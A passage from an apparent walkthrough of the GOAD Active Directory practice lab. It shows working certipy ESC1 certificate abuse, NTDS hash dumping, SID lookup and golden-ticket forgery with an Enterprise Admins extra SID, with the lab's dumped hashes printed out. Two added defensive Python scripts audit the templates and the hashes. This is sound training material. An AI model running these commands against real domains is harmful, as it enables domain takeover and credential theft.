      ESC6                              : Enrollees can specify SAN and Request Disposition is set to Issue. Does not work after May 2022
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates
  0
    Template Name                       : ESC4
    Display Name                        : ESC4
    Certificate Authorities             : ESSOS-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectRequireEmail
                                          SubjectAltRequireUpn
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
                                          PendAllRequests
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Code Signing
    Requires Manager Approval           : True
    Requires Key Archival               : False
    Authorized Signatures Required      : 1
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : ESSOS.LOCAL\Domain Users
      Object Control Permissions
        Owner                           : ESSOS.LOCAL\Enterprise Admins
        Full Control Principals         : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\khal.drogo
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Owner Principals          : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\khal.drogo
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Dacl Principals           : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\khal.drogo
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Property Principals       : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\khal.drogo
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
    [!] Vulnerabilities
      ESC4                              : 'ESSOS.LOCAL\\khal.drogo' has dangerous permissions
  1
    Template Name                       : ESC3-CRA
    Display Name                        : ESC3-CRA
    Certificate Authorities             : ESSOS-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : True
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
    Enrollment Flag                     : AutoEnrollment
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Certificate Request Agent
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : ESSOS.LOCAL\Domain Users
      Object Control Permissions
        Owner                           : ESSOS.LOCAL\Enterprise Admins
        Full Control Principals         : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Owner Principals          : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Dacl Principals           : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Property Principals       : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
    [!] Vulnerabilities
      ESC3                              : 'ESSOS.LOCAL\\Domain Users' can enroll and template has Certificate Request Agent EKU set
  2
    Template Name                       : ESC2
    Display Name                        : ESC2
    Certificate Authorities             : ESSOS-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : True
    Any Purpose                         : True
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
    Enrollment Flag                     : AutoEnrollment
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Any Purpose
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : ESSOS.LOCAL\Domain Users
      Object Control Permissions
        Owner                           : ESSOS.LOCAL\Enterprise Admins
        Full Control Principals         : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Owner Principals          : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Dacl Principals           : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Property Principals       : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
    [!] Vulnerabilities
      ESC2                              : 'ESSOS.LOCAL\\Domain Users' can enroll and template can be used for any purpose
      ESC3                              : 'ESSOS.LOCAL\\Domain Users' can enroll and template has Certificate Request Agent EKU set
  3
    Template Name                       : ESC1
    Display Name                        : ESC1
    Certificate Authorities             : ESSOS-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : ESSOS.LOCAL\Domain Users
      Object Control Permissions
        Owner                           : ESSOS.LOCAL\Enterprise Admins
        Full Control Principals         : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Owner Principals          : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Dacl Principals           : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
        Write Property Principals       : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\Local System
                                          ESSOS.LOCAL\Enterprise Admins
    [!] Vulnerabilities
      ESC1                              : 'ESSOS.LOCAL\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
A variety of vulnerable settings were reported: ESC6 and ESC8 on the CA itself, and templates vulnerable to ESC1 through ESC4.
This time I'll try attacking with ESC1.
┌──(kali㉿kali)-[~/goad/braavos]
└─$ certipy-ad req -u 'khal.drogo@essos.local' -p 'horse' -dc-ip 192.168.56.12 -target 192.168.56.23 -ca 'ESSOS-CA' -template ESC1 -upn 'administrator@essos.local'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 9
[*] Got certificate with UPN 'administrator@essos.local'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

┌──(kali㉿kali)-[~/goad/braavos]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.56.12
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@essos.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@essos.local': aad3b435b51404eeaad3b435b51404ee:217e50203a5aba59cefa863c724bf61b

┌──(kali㉿kali)-[~/goad/braavos]
└─$ ls
20241023161533_Certipy.json  20241023161533_Certipy.txt  20241023161533_Certipy.zip  administrator.ccache  administrator.pfx  asreproast.hash  braavos.nmap  missandei.ccache
I was able to get a TGT for Administrator, and certipy also recovered the account's NT hash from it.
With that, I can do anything the essos.local Administrator can do.
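To make the conditions behind each ESC label explicit, here is an added example (my own code, not certipy's and not part of the original post) that re-derives the findings above from the template attributes certipy printed. The template records are transcribed from the listing; the LOW_PRIV and ADMINS principal sets are assumptions for this lab. The harden() function applies the fixes a defender would make: stop the enrollee from supplying the subject, require manager approval, and strip write control from non-admin principals. Note also certipy's line "Certificate has no object SID" in the request output: the issued certificate lacks the SID extension used for strong certificate mapping, so a domain controller running in the full-enforcement mode introduced by KB5014754 would refuse to map it to the Administrator account.

```python
"""Re-derive the ESC1-ESC4 findings from the certipy template listing above.

Added example; this is not certipy's code and not part of the original post.
TEMPLATES is transcribed from the certipy text output; LOW_PRIV and ADMINS
are assumptions made for this lab.
"""

# Enrollment rights granted to any of these mean "any domain user can enroll".
LOW_PRIV = {
    "ESSOS.LOCAL\\Domain Users",
    "ESSOS.LOCAL\\Authenticated Users",
    "ESSOS.LOCAL\\Domain Computers",
    "ESSOS.LOCAL\\Everyone",
}
# Principals expected to hold write control over template objects; anyone
# else with such rights is an ESC4 finding (they can rewrite the template).
ADMINS = {
    "ESSOS.LOCAL\\Domain Admins",
    "ESSOS.LOCAL\\Enterprise Admins",
    "ESSOS.LOCAL\\Local System",
    "ESSOS.LOCAL\\Administrators",
}
# Object-control principals shared by every template in the listing.
DEFAULT_CONTROL = {"ESSOS.LOCAL\\Domain Admins", "ESSOS.LOCAL\\Local System",
                   "ESSOS.LOCAL\\Enterprise Admins"}


def template(name, control=DEFAULT_CONTROL, **fields):
    """Build a template record with certipy-style defaults, then override."""
    t = {"name": name, "enabled": True, "client_auth": False,
         "enrollment_agent": False, "any_purpose": False,
         "enrollee_supplies_subject": False, "manager_approval": False,
         "signatures_required": 0, "enroll": {"ESSOS.LOCAL\\Domain Users"},
         "write_control": set(control)}
    t.update(fields)
    return t


# The four templates certipy listed above, attribute for attribute.
TEMPLATES = [
    template("ESC4", manager_approval=True, signatures_required=1,
             control=DEFAULT_CONTROL | {"ESSOS.LOCAL\\khal.drogo"}),
    template("ESC3-CRA", enrollment_agent=True),
    template("ESC2", client_auth=True, enrollment_agent=True, any_purpose=True),
    template("ESC1", client_auth=True, enrollee_supplies_subject=True),
]


def check_template(t):
    """Return the ESC findings for one template, in certipy's numbering."""
    findings = []
    low_priv_enroll = t["enabled"] and bool(t["enroll"] & LOW_PRIV)
    ungated = not t["manager_approval"] and t["signatures_required"] == 0
    if low_priv_enroll and ungated:
        # ESC1: the requester picks the subject/UPN and the cert can log on.
        if t["enrollee_supplies_subject"] and t["client_auth"]:
            findings.append("ESC1")
        # ESC2: the Any Purpose EKU behaves like every EKU at once.
        if t["any_purpose"]:
            findings.append("ESC2")
        # ESC3: Certificate Request Agent EKU allows enrolling on behalf of others.
        if t["enrollment_agent"]:
            findings.append("ESC3")
    # ESC4: write control held by a non-admin principal, who could turn this
    # template into an ESC1 template themselves.
    for principal in sorted(t["write_control"] - ADMINS):
        findings.append(f"ESC4:{principal}")
    return findings


def find_vulnerable(templates):
    """Map template name -> findings, skipping clean templates."""
    result = {}
    for t in templates:
        findings = check_template(t)
        if findings:
            result[t["name"]] = findings
    return result


def harden(t):
    """Copy of a template with the usual fixes applied: no requester-supplied
    subject, manager approval required, write control limited to admins."""
    fixed = dict(t)
    fixed["enrollee_supplies_subject"] = False
    fixed["manager_approval"] = True
    fixed["write_control"] = t["write_control"] & ADMINS
    return fixed


if __name__ == "__main__":
    for name, findings in find_vulnerable(TEMPLATES).items():
        print(f"{name}: {', '.join(findings)}")
    print("after hardening:", find_vulnerable([harden(t) for t in TEMPLATES]))
```

Running it reproduces certipy's verdicts exactly (ESC4 via khal.drogo, ESC3 on ESC3-CRA, ESC2 plus ESC3 on ESC2, ESC1 on ESC1) and shows that the hardened copies raise no findings, which is the check to repeat after changing the templates in the lab.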
Sevenkingdoms walkthrough
Next, exploit the top-level parent domain, SEVENKINGDOMS.
I'll try forging a golden ticket myself.
First, get the NTLM hash of krbtgt for north.sevenkingdoms.local:
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ nxc smb north.sevenkingdoms.local -u Administrator -H aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4 --ntds
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] Y
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!)
SMB 192.168.56.11 445 WINTERFELL [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 192.168.56.11 445 WINTERFELL Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
SMB 192.168.56.11 445 WINTERFELL Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 192.168.56.11 445 WINTERFELL krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9cd8721de5b33c59702a9f64787f1ea3:::
SMB 192.168.56.11 445 WINTERFELL vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB 192.168.56.11 445 WINTERFELL arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709:::
SMB 192.168.56.11 445 WINTERFELL eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8:::
SMB 192.168.56.11 445 WINTERFELL catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5:::
SMB 192.168.56.11 445 WINTERFELL robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a:::
SMB 192.168.56.11 445 WINTERFELL sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:b777555c2e2e3716e075cc255b26c14d:::
SMB 192.168.56.11 445 WINTERFELL brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129:::
SMB 192.168.56.11 445 WINTERFELL rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560:::
SMB 192.168.56.11 445 WINTERFELL hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e:::
SMB 192.168.56.11 445 WINTERFELL jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755:::
SMB 192.168.56.11 445 WINTERFELL samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843:::
SMB 192.168.56.11 445 WINTERFELL jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664:::
SMB 192.168.56.11 445 WINTERFELL sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
SMB 192.168.56.11 445 WINTERFELL WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:77681f192335d80e476b29aabe77c9bf:::
SMB 192.168.56.11 445 WINTERFELL CASTELBLACK$:1105:aad3b435b51404eeaad3b435b51404ee:20425334e9f78d883485696487ab1b67:::
SMB 192.168.56.11 445 WINTERFELL SEVENKINGDOMS$:1104:aad3b435b51404eeaad3b435b51404ee:f85ab966533246d54fc98f68f6741dd8:::
SMB 192.168.56.11 445 WINTERFELL [+] Dumped 19 NTDS hashes to /home/kali/.nxc/logs/WINTERFELL_192.168.56.11_2024-10-26_222548.ntds of which 16 were added to the database
SMB 192.168.56.11 445 WINTERFELL [*] To extract only enabled accounts from the output file, run the following command:
SMB grep -iv disabled | cut -d ':' -f1
SMB 192.168.56.11 445 WINTERFELL [*] grep -iv disabled /home/kali/.nxc/logs/WINTERFELL_192.168.56.11_2024-10-26_222548.ntds | cut -d ':' -f1
Got the hash for krbtgt.
Next, let's get the Domain SIDs.
First, 192.168.56.11:
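Before moving on, here is what a defender gets out of the two NTDS dumps above (the MEEREEN one earlier and the WINTERFELL one just now). This is an added example, my own code rather than anything from the post, nxc or Impacket: it parses pwdump-style "user:rid:lmhash:nthash:::" records, with or without nxc's leading columns, and flags accounts with the empty-password NT hash, any account that still stores a real LM hash, and NT hashes shared by more than one account. Because the NT hash is unsalted, an identical hash means an identical password, and that holds across domains too: the dumps show vagrant and sql_svc using the same password in essos.local and north.sevenkingdoms.local. The sample input below is a constructed subset of the lines printed above.

```python
"""Audit a secretsdump / nxc --ntds dump for weak or shared credentials.

Added example, not from the original post or the GOAD project. The sample
lines are copied from the dumps shown above; the audit logic is an assumption
about what a defender would check, not a feature of nxc or Impacket.
"""
import re
from collections import defaultdict

# NT hash of the empty password. Guest/DefaultAccount carry it because they
# are disabled built-ins; any *enabled* account with it has no password.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
# LM hash value meaning "no LM hash stored" (the expected state today).
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

# One pwdump-style record "user:rid:lmhash:nthash:::", optionally preceded by
# nxc's "SMB <ip> <port> <hostname>" columns. finditer() over the whole text
# also copes with output that was flattened onto a single line.
RECORD_RE = re.compile(
    r"(?:SMB\s+\S+\s+\d+\s+\S+\s+)?"
    r"(?P<user>[^\s:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)

# Constructed sample: a subset of the MEEREEN (essos.local) dump, with the
# nxc prefix columns left in place.
MEEREEN_DUMP = """
SMB 192.168.56.12 445 MEEREEN Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
SMB 192.168.56.12 445 MEEREEN Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 192.168.56.12 445 MEEREEN vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB 192.168.56.12 445 MEEREEN missandei:1116:aad3b435b51404eeaad3b435b51404ee:1b4fd18edf477048c7a7c32fda251cec:::
SMB 192.168.56.12 445 MEEREEN sql_svc:1118:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
"""

# Constructed sample: a subset of the WINTERFELL (north.sevenkingdoms.local)
# dump in plain secretsdump format, without the prefix columns.
WINTERFELL_DUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755:::
sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
"""


def parse_dump(text, domain):
    """Extract one record dict per hash line found in the dump text."""
    records = []
    for m in RECORD_RE.finditer(text):
        records.append({
            "domain": domain,
            "user": m.group("user"),
            "rid": int(m.group("rid")),
            "lm": m.group("lm").lower(),
            "nt": m.group("nt").lower(),
        })
    return records


def audit(records):
    """Flag empty passwords, stored LM hashes and NT hashes shared by accounts."""
    by_nt = defaultdict(list)
    empty_password, lm_stored = [], []
    for r in records:
        label = f"{r['domain']}\\{r['user']}"
        if r["lm"] != EMPTY_LM_HASH:
            lm_stored.append(label)
        if r["nt"] == EMPTY_NT_HASH:
            empty_password.append(label)   # reported separately, not as reuse
        else:
            by_nt[r["nt"]].append(label)
    # Same NT hash on two accounts means the same password (NT is unsalted);
    # grouping across domains surfaces vagrant and sql_svc here.
    reused = {h: users for h, users in by_nt.items() if len(users) > 1}
    return {"empty_password": empty_password,
            "lm_stored": lm_stored,
            "reused_hash": reused}


def audit_report():
    """Run the audit over both constructed samples."""
    records = parse_dump(MEEREEN_DUMP, "essos.local")
    records += parse_dump(WINTERFELL_DUMP, "north.sevenkingdoms.local")
    return audit(records)


if __name__ == "__main__":
    for finding, items in audit_report().items():
        print(finding, items)
```

On the real .ntds files nxc wrote (paths in the output above), call parse_dump() on each file's contents with its domain name and pass the combined list to audit(); the empty-password list should then be cross-checked against account status, since nxc marks disabled accounts in the file and only enabled ones matter.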
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ impacket-lookupsid -domain-sids north.sevenkingdoms.local/Administrator@192.168.56.11 -hashes aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Brute forcing SIDs at 192.168.56.11
[*] StringBinding ncacn_np:192.168.56.11[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2343606889-1312097775-3500245986
500: NORTH\Administrator (SidTypeUser)
501: NORTH\Guest (SidTypeUser)
502: NORTH\krbtgt (SidTypeUser)
512: NORTH\Domain Admins (SidTypeGroup)
513: NORTH\Domain Users (SidTypeGroup)
514: NORTH\Domain Guests (SidTypeGroup)
515: NORTH\Domain Computers (SidTypeGroup)
516: NORTH\Domain Controllers (SidTypeGroup)
517: NORTH\Cert Publishers (SidTypeAlias)
520: NORTH\Group Policy Creator Owners (SidTypeGroup)
521: NORTH\Read-only Domain Controllers (SidTypeGroup)
522: NORTH\Cloneable Domain Controllers (SidTypeGroup)
525: NORTH\Protected Users (SidTypeGroup)
526: NORTH\Key Admins (SidTypeGroup)
553: NORTH\RAS and IAS Servers (SidTypeAlias)
571: NORTH\Allowed RODC Password Replication Group (SidTypeAlias)
572: NORTH\Denied RODC Password Replication Group (SidTypeAlias)
1000: NORTH\vagrant (SidTypeUser)
1001: NORTH\WINTERFELL$ (SidTypeUser)
1102: NORTH\DnsAdmins (SidTypeAlias)
1103: NORTH\DnsUpdateProxy (SidTypeGroup)
1104: NORTH\SEVENKINGDOMS$ (SidTypeUser)
1105: NORTH\CASTELBLACK$ (SidTypeUser)
1106: NORTH\Stark (SidTypeGroup)
1107: NORTH\Night Watch (SidTypeGroup)
1108: NORTH\Mormont (SidTypeGroup)
1109: NORTH\AcrossTheSea (SidTypeAlias)
1110: NORTH\arya.stark (SidTypeUser)
1111: NORTH\eddard.stark (SidTypeUser)
1112: NORTH\catelyn.stark (SidTypeUser)
1113: NORTH\robb.stark (SidTypeUser)
1114: NORTH\sansa.stark (SidTypeUser)
1115: NORTH\brandon.stark (SidTypeUser)
1116: NORTH\rickon.stark (SidTypeUser)
1117: NORTH\hodor (SidTypeUser)
1118: NORTH\jon.snow (SidTypeUser)
1119: NORTH\samwell.tarly (SidTypeUser)
1120: NORTH\jeor.mormont (SidTypeUser)
1121: NORTH\sql_svc (SidTypeUser)
Next, 192.168.56.10:
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ impacket-lookupsid -domain-sids north.sevenkingdoms.local/Administrator@192.168.56.10 -hashes aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Brute forcing SIDs at 192.168.56.10
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2095540843-66383145-2975355457
498: SEVENKINGDOMS\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SEVENKINGDOMS\Administrator (SidTypeUser)
501: SEVENKINGDOMS\Guest (SidTypeUser)
502: SEVENKINGDOMS\krbtgt (SidTypeUser)
512: SEVENKINGDOMS\Domain Admins (SidTypeGroup)
513: SEVENKINGDOMS\Domain Users (SidTypeGroup)
514: SEVENKINGDOMS\Domain Guests (SidTypeGroup)
515: SEVENKINGDOMS\Domain Computers (SidTypeGroup)
516: SEVENKINGDOMS\Domain Controllers (SidTypeGroup)
517: SEVENKINGDOMS\Cert Publishers (SidTypeAlias)
518: SEVENKINGDOMS\Schema Admins (SidTypeGroup)
519: SEVENKINGDOMS\Enterprise Admins (SidTypeGroup)
520: SEVENKINGDOMS\Group Policy Creator Owners (SidTypeGroup)
521: SEVENKINGDOMS\Read-only Domain Controllers (SidTypeGroup)
522: SEVENKINGDOMS\Cloneable Domain Controllers (SidTypeGroup)
525: SEVENKINGDOMS\Protected Users (SidTypeGroup)
526: SEVENKINGDOMS\Key Admins (SidTypeGroup)
527: SEVENKINGDOMS\Enterprise Key Admins (SidTypeGroup)
553: SEVENKINGDOMS\RAS and IAS Servers (SidTypeAlias)
571: SEVENKINGDOMS\Allowed RODC Password Replication Group (SidTypeAlias)
572: SEVENKINGDOMS\Denied RODC Password Replication Group (SidTypeAlias)
1000: SEVENKINGDOMS\vagrant (SidTypeUser)
1001: SEVENKINGDOMS\KINGSLANDING$ (SidTypeUser)
1102: SEVENKINGDOMS\DnsAdmins (SidTypeAlias)
1103: SEVENKINGDOMS\DnsUpdateProxy (SidTypeGroup)
1104: SEVENKINGDOMS\NORTH$ (SidTypeUser)
1105: SEVENKINGDOMS\ESSOS$ (SidTypeUser)
1106: SEVENKINGDOMS\Lannister (SidTypeGroup)
1107: SEVENKINGDOMS\Baratheon (SidTypeGroup)
1108: SEVENKINGDOMS\Small Council (SidTypeGroup)
1109: SEVENKINGDOMS\DragonStone (SidTypeGroup)
1110: SEVENKINGDOMS\KingsGuard (SidTypeGroup)
1111: SEVENKINGDOMS\DragonRider (SidTypeGroup)
1112: SEVENKINGDOMS\AcrossTheNarrowSea (SidTypeAlias)
1113: SEVENKINGDOMS\tywin.lannister (SidTypeUser)
1114: SEVENKINGDOMS\jaime.lannister (SidTypeUser)
1115: SEVENKINGDOMS\cersei.lannister (SidTypeUser)
1116: SEVENKINGDOMS\tyron.lannister (SidTypeUser)
1117: SEVENKINGDOMS\robert.baratheon (SidTypeUser)
1118: SEVENKINGDOMS\joffrey.baratheon (SidTypeUser)
1119: SEVENKINGDOMS\renly.baratheon (SidTypeUser)
1120: SEVENKINGDOMS\stannis.baratheon (SidTypeUser)
1121: SEVENKINGDOMS\petyer.baelish (SidTypeUser)
1122: SEVENKINGDOMS\lord.varys (SidTypeUser)
1123: SEVENKINGDOMS\maester.pycelle (SidTypeUser)
192.168.56.11 (NORTH): S-1-5-21-2343606889-1312097775-3500245986
192.168.56.10 (SEVENKINGDOMS): S-1-5-21-2095540843-66383145-2975355457
Now that we have the child domain's krbtgt hash and the SID of the parent domain we want to escalate into, we can create a Golden Ticket.
The important point here is to append RID 519 (Enterprise Admins, as the SEVENKINGDOMS lookupsid output shows) to the parent domain SID and pass the result as extra-sid: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/sid-history-injection#sid-history-injection-attack
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ impacket-ticketer -nthash 9cd8721de5b33c59702a9f64787f1ea3 -domain-sid S-1-5-21-2343606889-1312097775-3500245986 -domain north.sevenkingdoms.local -extra-sid S-1-5-21-2095540843-66383145-2975355457-519 goldenuser
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Creating basic skeleton ticket and PAC Infos
/usr/share/doc/python3-impacket/examples/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for north.sevenkingdoms.local/goldenuser
/usr/share/doc/python3-impacket/examples/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/usr/share/doc/python3-impacket/examples/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/share/doc/python3-impacket/examples/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
/usr/share/doc/python3-impacket/examples/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in goldenuser.ccache
Use the golden ticket to run secretsdump against the top-level domain.
┌──(kali㉿kali)-[~/goad/winterfell]
└─$ export KRB5CCNAME=goldenuser.ccache

┌──(kali㉿kali)-[~/goad/winterfell]
└─$ impacket-secretsdump -k -no-pass -just-dc-ntlm north.sevenkingdoms.local/goldenuser@kingslanding.sevenkingdoms.local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c66d72021a2d4744409969a581a1705e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:20c52248354cb5f4cce513c736ce99a5:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
